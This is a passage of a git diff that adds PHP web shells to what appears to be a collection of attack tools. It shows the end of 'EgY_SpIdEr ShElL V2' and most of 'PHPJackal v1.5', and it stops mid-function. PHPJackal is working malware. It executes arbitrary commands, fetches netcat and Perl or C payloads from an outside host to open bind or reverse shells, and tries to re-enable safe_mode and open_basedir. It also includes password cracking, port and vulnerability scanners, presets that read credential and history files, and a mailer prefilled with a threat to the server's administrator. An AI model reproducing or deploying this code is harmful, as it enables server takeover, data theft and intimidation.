+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','egy_ini',10,'ini.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text228']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','egy_vb',10,'vb_hacker.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text230']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','egy_cp',10,'pass_cpanel.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
+echo $te.'</div>'.$table_end1.$fe;
+{
+
+
+
+echo $te."</td>".$fe."</tr></div></table>";
+}
+
+echo $te."</td></tr></div></table>";
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=tahoma size=-2><b>o---[ EgY_SpIdEr | </a> | <a egy_spider@hotmail.com>egy_spider@hotmail.com</a> developer by EgY SpIdEr ]---o</b></font></div></td></tr></table>";
+echo '</body></html>';
+?>
diff --git a/php/PHPshell/م€گEgY_SpIdEr ShElL V2م€‘/EgY_SpIdEr ShElL V2.php.jpg b/php/PHPshell/م€گEgY_SpIdEr ShElL V2م€‘/EgY_SpIdEr ShElL V2.php.jpg
new file mode 100644
index 0000000..1ea4e3f
Binary files /dev/null and b/php/PHPshell/م€گEgY_SpIdEr ShElL V2م€‘/EgY_SpIdEr ShElL V2.php.jpg differ
diff --git a/php/PHPshell/م€گEgY_SpIdEr ShElL V2م€‘/EgY_SpIdEr ShElL V2.php2.jpg b/php/PHPshell/م€گEgY_SpIdEr ShElL V2م€‘/EgY_SpIdEr ShElL V2.php2.jpg
new file mode 100644
index 0000000..2d94764
Binary files /dev/null and b/php/PHPshell/م€گEgY_SpIdEr ShElL V2م€‘/EgY_SpIdEr ShElL V2.php2.jpg differ
diff --git a/php/PHPshell/م€گPHPJackal v1.5م€‘/PHPJackal v1.5.jpg b/php/PHPshell/م€گPHPJackal v1.5م€‘/PHPJackal v1.5.jpg
new file mode 100644
index 0000000..0d35b0b
Binary files /dev/null and b/php/PHPshell/م€گPHPJackal v1.5م€‘/PHPJackal v1.5.jpg differ
diff --git a/php/PHPshell/م€گPHPJackal v1.5م€‘/PHPJackal v1.5.php b/php/PHPshell/م€گPHPJackal v1.5م€‘/PHPJackal v1.5.php
new file mode 100644
index 0000000..37adef6
--- /dev/null
+++ b/php/PHPshell/م€گPHPJackal v1.5م€‘/PHPJackal v1.5.php
@@ -0,0 +1,1413 @@
+<?php
+#--Config--#
+$login_password= '123456'; //صâتاأـآë
+#----------#
+error_reporting(E_ALL);
+set_time_limit(0);
+ini_set("max_execution_time","0");
+ini_set("memory_limit","9999M");
+set_magic_quotes_runtime(0);
+if(!isset($_SERVER))$_SERVER = &$HTTP_SERVER_VARS;
+if(!isset($_POST))$_POST = &$HTTP_POST_VARS;
+if(!isset($_GET))$_GET = &$HTTP_GET_VARS;
+if(!isset($_COOKIE))$_COOKIE=$HTTP_COOKIE_VARS;
+$_REQUEST = array_merge($_GET, $_POST);
+if (get_magic_quotes_gpc()){
+foreach ($_REQUEST as $key=>$value)
+{
+$_REQUEST[$key]=stripslashes($value);
+}
+}
+function hlinK($str=""){
+$myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL');
+$ret=$_SERVER['PHP_SELF']."?";
+$new=explode("&",$str);
+foreach ($_GET as $key => $v){
+$add=1;
+foreach($new as $m){
+$el = explode("=", $m);
+if ($el[0]==$key)$add=0;
+}
+if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&";
+}
+$ret.=$str;
+return $ret;
+}
+if(!empty($login_password)){
+if(!empty($_REQUEST['fpassw'])){
+if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw']));
+@header("Location: ".hlinK());
+}
+if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("<html><body><table><form method=post><tr><td>Password:</td><td><input type=hidden name=seC value=about><input type=password name=fpassw></td></tr><tr><td></td><td><input type=submit value=login></td></tr></form></table></body></html>");
+}
+if (!empty($_REQUEST['workingdiR'])) chdir($_REQUEST['workingdiR']);
+function checkthisporT($ip,$port,$timeout,$type=0){
+if(!$type){
+$scan=@fsockopen($ip,$port,$n,$s,$timeout);
+if($scan){fclose($scan);return 1;}
+}
+elseif(function_exists('socket_set_timeout')){
+$scan=@fsockopen("udp://".$ip,$port);
+if($scan){
+socket_set_timeout($scan,$timeout);
+@fwrite($scan,"\x00");
+$s=time();
+fread($scan,1);
+if((time()-$s)>=$timeout){fclose($scan);return 1;}
+}
+}
+return 0;
+}
+if (!function_exists("file_get_contents")){
+function file_get_contents($addr){ +$a = fopen($addr,"r"); +$tmp = fread($a,filesize($a)); +fclose($a); +if($a)return $tmp; +} +} +if (!function_exists("file_put_contents")){ +function file_put_contents($addr,$con){ +$a = fopen($addr,"w"); +if(!$a)return 0; +fwrite($a,$con); +fclose($a); +return strlen($con); +} +} +function flusheR(){ +flush();@ob_flush(); +} +if (!empty($_REQUEST['downloaD'])){ +@ob_clean(); +$dl=$_REQUEST['downloaD']; +$con=file_get_contents($dl); +header("Content-type: application/octet-stream"); +header("Content-disposition: attachment; filename=\"$dl\";"); +header("Content-length: ".strlen($con)); +echo $con; +exit; +} +if (!empty($_REQUEST['imagE'])){ +$img=$_REQUEST['imagE']; +header("Content-type: imagE/gif"); +header("Content-length: ".filesize($img)); +header("Last-Modified: ".date("r",filemtime($img))); +echo file_get_contents($img); +exit; +} +@header("Cache-Control: no-cache, must-revalidate"); +@header("Expires: Mon, 7 Aug 1987 05:00:00 GMT"); +function showsizE($size){ +if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB"; +elseif ($size>=1048576)$size = round(($size/1048576),2)." MB"; +elseif ($size>=1024)$size = round(($size/1024),2)." 
KB"; +else $size .= " B"; +return $size; +} +if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0; +$errorbox = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td><b>Error: </b>"; +$et = "</td></tr></table>"; +$v="1.5"; +$msgbox="<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td align=\"center\">"; +$intro="<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\"><tr><td bgcolor=\"#666666\"><b>Script:</b><br>".str_repeat("-=-",25)."<br><b>Name:</b> PHPJackal<br><b>Version:</b> $v<br><br><b>Author:</b><br>".str_repeat("-=-",25)."<br><b>Name:</b> NetJackal<br><b>Country:</b> Iran<br><b>Website:</b> <a href=\"http://netjackal.by.ru\" target=\"_blank\">http://netjackal.by.ru</a><br><b>Email:</b> <a href=\"mailto:nima_501@yahoo.com?subject=PHPJackal\">nima_501@yahoo.com</a><br></font>$et</center>"; +$footer="${msgbox}PHPJackal v$v - Powered By <a href=\"http://netjackal.by.ru\" target=\"_blank\">NetJackal</a>$et"; +$hcwd="<input type=hidden name=workingdiR value=\"".getcwd()."\">"; +$t = "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#333333\">"; +$crack="</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\" name=form><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo 
(U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>"; +function namE(){ +$name=''; +srand((double)microtime()*100000); +for ($i=0;$i<=rand(3,10);$i++){ +$name.=chr(rand(97,122)); +} +return $name; +} +function whereistmP(){ +$uploadtmp=ini_get('upload_tmp_dir'); +$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); +if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; +if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; +if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; +if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; +if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; +return "."; +} +function shelL($command){ +global $windows,$disablefunctions; +$exec = '';$output= ''; +$dep[]=array('pipe','r');$dep[]=array('pipe','w'); +if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();} +elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; } +elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;} +elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);} +elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);} +elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = 
fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);} +elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);} +return $exec; +} +function downloadiT($get,$put){ +$fo=@strtolower(ini_get('allow_url_fopen')); +if($fo || $fo=='on')$con=file_get_contents($get); +else{ +$u=parse_url($get); +$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; +$url=fsockopen($host, 80, $en, $es, 12); +fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); +$tmp=$con=''; +while($tmp!="\r\n")$tmp=fgets($url); +while(!feof($url))$con.=fgets($url); +} +$mk=file_put_contents($put,$con); +if($mk)return 1; +return 0; +} +function smtplogiN($addr,$user,$pass,$timeout){ +$sock=fsockopen($addr,25,$n,$s,$timeout); +if(!$sock)return -1; +fread($sock,1024); +fputs($sock,'ehlo '.namE()."\r\n"); +$res=substr(fgets($sock,512),0,1); +if($res!='2')return 0; +fgets($sock,512);fgets($sock,512);fgets($sock,512); +fputs($sock,"AUTH LOGIN\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='334')return 0; +fputs($sock,base64_encode($user)."\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='334')return 0; +fputs($sock,base64_encode($pass)."\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='235')return 0; +return 1; +} +function checksmtP($host,$timeout){ +$from=strtolower(namE())."@".strtolower(namE()).".com"; +$sock=@fsockopen($host,25,$n,$s,$timeout); +if(!$sock)return -1; +$res=substr(fgets($sock,512),0,3); +if($res!='220')return 0; +fputs($sock,'HELO '.namE()."\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='250')return 0; +fputs($sock,"MAIL FROM: <$from>\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='250')return 0; +fputs($sock,"RCPT TO: 
<contact@persianblog.com>\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='250')return 0; +fputs($sock,"DATA\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='354')return 0; +fputs($sock,"From: ".namE()." ".namE()." <$from>\r\nSubject: ".namE()."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".namE().namE().namE()."\r\n.\r\n"); +$res=substr(fgets($sock,512),0,3); +if($res!='250')return 0; +return 1; +} +function check_urL($url,$method,$search,$timeout){ +if(empty($search))$search='200'; +$u=parse_url($url); +$method=strtoupper($method); +$host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; +$data=(!empty($u['query']))?$u['query']:''; +if(!empty($data))$data="?$data"; +$sock=@fsockopen($host,80,$en,$es,$timeout); +if($sock){ +fputs($sock,"$method $file$data HTTP/1.0\r\n"); +fputs($sock,"Host: $host\r\n"); +if($method=='GET')fputs($sock,"\r\n"); +elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data"); +else return 0; +if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;} +while(!feof($sock)){ +$res=trim(fgets($sock)); +if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;} +} +fclose($sock); +} +return 0; +} +function get_sw_namE($host,$timeout){ +$sock=@fsockopen($host,80,$en,$es,$timeout); +if($sock){ +$page=namE().namE(); +fputs($sock,"GET /$page HTTP/1.0\r\n\r\n"); +while(!feof($sock)){ +$con=fgets($sock); +if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;} +} +fclose($sock); +return -1; +}return 0; +} +function snmpchecK($ip,$com,$timeout){ +$res=0; +$n=chr(0x00); +$packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)). +$com. chr(0xA0). +chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n. +chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C). 
+chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01). +chr(0x01). chr(0x01). $n. chr(0x05). $n; +$sock=@fsockopen("udp://$ip",161); +socket_set_timeout($sock,$timeout); +@fputs($sock,$packet); +socket_set_timeout($sock,$timeout); +$res=fgets($sock); +fclose($sock); +return $res; +} + +$safemode=(@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on')?'ON':'OFF'; +if($safemode=="ON"){@ini_restore("safe_mode");@ini_restore("open_basedir");} +$disablefunctions = @ini_get('disable_functions'); +if (!function_exists("str_repeat")){ +function str_repeat($str,$c){ +$r=""; +for($i=0; $i < $cu; $i++)$r.=$str; +return $r; +} +} + +function brshelL(){ +global $errorbox, $windows,$et,$hcwd; +$_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0; +$addr='http://netjackal.by.ru/backdoor'; +$error="$errorbox Can not make backdoor file, go to writeable folder.$et"; +$n=namE(); +if(!$windows)$n=".$n"; +$d=whereistmP(); +$name=$d.DIRECTORY_SEPARATOR.$n; +$perl=(!$windows && shelL('which perl'))?$perl=shelL('which perl'):'perl'; +$c=($_REQUEST['C'])?1:0; +if (!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1) ){ +$port=(int)$_REQUEST['port']; +if($windows){ +if($c){ +$name.=".exe"; +$bd=downloadiT("$addr/nc.exe",$name); +shelL("attrib +H $name"); +if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe"); +}else{ +$name = $name.".pl"; +$bd=downloadiT("$addr/winbind.pl",$name); +shelL("attrib +H $name"); +if(!$bd)echo $error;else shelL("perl.exe $name $port"); +} +} +else{ +if($c){ +$bd=downloadiT("$addr/bind.c",$name); +if (!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &"); +}else{ +$bd=downloadiT("$addr/bind.pl",$name); +if (!$bd)echo $error; else shelL("cd $d;$perl $n $port &"); +echo "<font color=blue>Backdoor is waiting for you on $port.<br></font>"; +} +} +} +elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && 
!empty($_REQUEST['ip'])){ +$ip=$_REQUEST['ip']; +$port=(int)$_REQUEST['rport']; +if($windows){ +if($c){ +$name.='.exe'; +$bd=downloadiT("$addr/nc.exe",$name); +shelL("attrib +H $name"); +if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe"); +}else{ +$name = $name.".pl"; +$bd=downloadiT("$addr/winrc.pl",$name); +shelL("attrib +H $name"); +if (!$bd)echo $error; else shelL("perl.exe $name $ip $port"); +} +} +else{ +if($c){ +$bd=downloadiT("$addr/rc.c",$name); +if(!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &"); +}else{ +$bd=downloadiT("$addr/rc.pl",$name); +if(!$bd)echo $error;else shelL("cd $d;$perl $n $ip $port &"); +} +} +echo "<font color=blue>Done!</font>";} +else{echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"50%\" bgcolor=\"#333333\">Bind shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=port value=55501 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input type=submit class=buttons value=Bind></td></tr></form></table></td><td><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"50%\"><tr><td width=\"40%\" bgcolor=\"#333333\">Reverse shelL:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#808080\">IP:</td><td bgcolor=\"#808080\"><input type=text name=ip value=";echo $_SERVER["REMOTE_ADDR"]; echo " 
size=17></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Port:</td><td bgcolor=\"#666666\"><input type=text name=rport value=53 size=5></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Type:</td><td bgcolor=\"#808080\"><input type=radio style=\"border-width:1px;background-color:#808080;\" value=0 checked name=C>PERL<input type=radio style=\"border-width:1px;background-color:#808080;\" name=C value=1>"; if($windows)echo "EXE"; else echo "C";echo"</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Connect></td></tr></form></table>$et";}} +function showimagE($img){ +echo "<center><img border=0 src=\"".hlinK("imagE=$img&&workingdiR=".getcwd())."\"></center>";} +function editoR($file){ +global $errorbox,$et,$hcwd; +if (is_file($file)){ +if (!is_readable($file)){echo "$errorbox File is not readable$et<br>";} +if (!is_writeable($file)){echo "$errorbox File is not writeable$et<br>";} +$data = file_get_contents($file); +echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\">$hcwd<input type=text value=\"".htmlspecialchars($file)."\" size=75 name=file><input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"64\">"; +echo htmlspecialchars($data); +echo "</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"$file\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">"; +} +else {echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"10%\" bgcolor=\"#808080\"><form method=\"POST\"><input type=text value=\"".getcwd()."\" size=75 
name=file>$hcwd<input type=submit class=buttons name=Open value=Open></td></tr></form></table><br><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"40%\" bgcolor=\"#666666\"><form method=\"POST\"><textarea rows=\"18\" name=\"edited\" cols=\"63\"></textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"><input type=text value=\"".getcwd()."\" size=80 name=file></td></tr><td width=\"40%\" bgcolor=\"#666666\" align=\"right\">"; +} +echo "$hcwd<input type=submit class=buttons name=Save value=Save></td></form></tr></table></center>"; +} +function webshelL(){ +global $windows,$hcwd; +if($windows){ +$alias="<option value=\"netstat -an\">Display open ports</option><option value=\"tasklist\">List of processes</option><option value=\"systeminfo\">System information</option><option value=\"ipconfig /all\">IP configuration</option><option value=\"getmac\">Get MAC address</option><option value=\"net start\">Services list</option><option value=\"net view\">Machines in domain</option><option value=\"net user\">Users list</option><option value=\"gpresult\">Group policy</option><option value=\"shutdown -s -f -t 1\">Turn off the server</option>"; +} +else{ +$alias="<option value=\"netstat -an | grep -i listen\">Display open ports</option><option value=\"last -a -n 250 -i\">Show last 250 logged in users</option><option value=\"which wget curl lynx w3m\">Downloaders</option><option value=\"find / -perm -2 -type d -print\">Find world-writable directories</option><option value=\"find . -perm -2 -type d -print\">Find world-writable directories(in current directory)</option><option value=\"find / -perm -2 -type f -print\">Find world-writable files</option><option value=\"find . 
-perm -2 -type f -print\">Find world-writable files(in current directory)</option><option value=\"find / -type f -perm 04000 -ls\">Find files with SUID bit set</option><option value=\"find / -type f -perm 02000 -ls\">Find files with SGID bit set</option><option value=\"find / -name .htpasswd -type f\">Find .htpasswd files</option><option value=\"find / -type f -name .bash_history\">Find .bash_history files</option><option value=\"cat /etc/syslog.conf\">View syslog.conf</option><option value=\"cat cat /etc/hosts\">View hosts</option><option value=\"ps auxw\">List of processes</option>"; +if(is_dir('/etc/valiases'))$alias.="<option value=\"ls -l /etc/valiases\">List of Cpanel`s domains(valiases)</option>";if(is_dir('/etc/vdomainaliases'))$alias.="<option value=\"ls -l /etc/vdomainaliases\">List Cpanel`s domains(vdomainaliases)</option>";if(file_exists('/var/cpanel/accounting.log'))$alias.="<option value=\"cat /var/cpanel/accounting.log\">Display Cpanel`s log</option>"; +if(is_dir('/var/spool/mail/'))$alias.="<option value=\"ls /var/spool/mail/\">Mailboxes list</option>"; +} +echo "<center><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=82 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"65%\"><tr><td><b>Web Shell:</b></td></tr><td bgcolor=\"#666666\"><textarea rows=\"22\" cols=\"78\">"; +if (!empty($_REQUEST['cmd'])) echo shelL($_REQUEST['cmd']); +echo"</textarea></td></tr><form method=post><tr><td bgcolor=\"#808080\"><input type=text size=91 name=cmd value=\"";if (!empty($_REQUEST['cmd'])) echo htmlspecialchars(($_REQUEST['cmd']));elseif(!$windows) echo "cat /etc/passwd";echo "\">$hcwd<input 
class=buttons type=submit value=Execute></td></tr></form></td></tr><form method=post><tr><td bgcolor=\"#808080\"><select name=\"cmd\" width=70>$alias</select>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></table><center>"; +} +function maileR(){ +global $msgbox,$et,$hcwd; +$cwd= getcwd(); +if (!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){ +$to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body']; +if (!mail($to,$subject,$body,"From: $from"))break; +echo "$msgbox<b>Mail sent!</b><br>$et"; +} +echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td><b>Mailer:</b></td></tr><td width=\"20%\" bgcolor=\"#666666\">SMTP</td><td bgcolor=\"#666666\">".ini_get('SMTP')." (".ini_get('smtp_port').")</td></tr><tr><td bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\"><input name=from type=text value=\"evil@hell.gov\" size=55>$hcwd</td><tr><td width=\"25%\" bgcolor=\"#666666\">To:</td><td bgcolor=\"#666666\"><input name=to type=text value=\""; if (!empty($_REQUEST['to'])) echo htmlspecialchars($_REQUEST['to']); elseif(!empty($_ENV["SERVER_ADMIN"])) echo $_ENV["SERVER_ADMIN"];else echo "admin@".getenv('HTTP_HOST'); echo "\" size=55></td></tr><tr><td bgcolor=\"#808080\">Subject:</td><td bgcolor=\"#808080\"><input name=subject type=text value=\"YOUR SERVER HAS BEED HACKED :-P\" size=55></td><tr><td bgcolor=\"#666666\">Body:</td><td bgcolor=\"#666666\"><textarea rows=\"18\" cols=\"43\" name=body>Admin, your system has been hacked! 
if you don`t seCure it, next time i`ll format your box.</textarea></td></tr><tr><td width=\"10%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=\"right\"><input type=submit class=buttons value=Send></form>$et"; +} +function scanneR(){ +global $hcwd; +if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1"; +$udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1; +if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){ +$target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0; +echo "<font color=blue>Port scanning started against ".htmlspecialchars($target).":<br>"; +$start=time(); +for($i=$from;$i<=$to;$i++){ +if($tcp){ +if (checkthisporT($target,$i,$timeout)){ +$nu++; +$ser=""; +if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")"; +echo "$nu) $i $ser (<a href=\"telnet://$target:$i\">Connect</a>) [TCP]<br>"; +} +} +if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]<br>";} +flusheR(); +} +$time=time()-$start; +echo "Done! ($time seconds)</font>"; +} +elseif (!empty($_REQUEST['securityscanner'])){ +echo "<font color=blue>"; +$start=time(); +$from=$_REQUEST['from']; +$to=(int)$_REQUEST['to']; +$timeout=(int)$_REQUEST['timeout']; +$f = substr($from,strrpos($from,".")+1); +$from = substr($from,0,strrpos($from,".")); +if(!empty($_REQUEST['httpscanner'])){ +echo "Loading webserver bug list..."; +flusheR(); +$buglist=whereistmP().DIRECTORY_SEPARATOR.namE(); +$dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist); +if($dl){$file=file($buglist);echo "Done! scanning started.<br><br>";}else echo "Failed!!! 
scanning started without webserver security testing...<br><br>"; +flusheR(); +}else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:<br><br>";} +for($i=$f;$i<=$to;$i++){ +$output=0; +$ip="$from.$i"; +if(!empty($_REQUEST['nslookup'])){ +$hn=gethostbyaddr($ip); +if($hn!=$ip)echo "$ip [$hn]<br>";} +flusheR(); +if(!empty($_REQUEST['ipscanner'])){ +$port=$_REQUEST['port']; +if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port; +$open=$ser=""; +foreach($p as $po){ +$scan=checkthisporT($ip,$po,$timeout); +if ($scan){ +$ser=""; +if($ser=getservbyport($po,"tcp"))$ser="($ser)"; +$open.=" $po$ser "; +} +} +if($open){echo "$ip) Open ports:$open<br>";$output=1;} +flusheR(); +} +if(!empty($_REQUEST['httpbanner'])){ +$res=get_sw_namE($ip,$timeout); +if($res){ +echo "$ip) Webserver software: "; +if($res==-1)echo "Unknow"; +else echo $res; +echo "<br>"; +$output=1; +} +flusheR(); +} +if(!empty($_REQUEST['httpscanner'])){ +if(checkthisporT($ip,80,$timeout) && !empty($file)){ +$admin=array('/admin/','/adm/'); +$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www'); +$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/'); +$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/'); +foreach ($file as $v){ +$vuln=array(); +$v=trim($v); +if(!$v || $v{0}=='#')continue; +$v=str_replace('","','^',$v); +$v=str_replace('"','',$v); +$vuln=explode('^',$v); 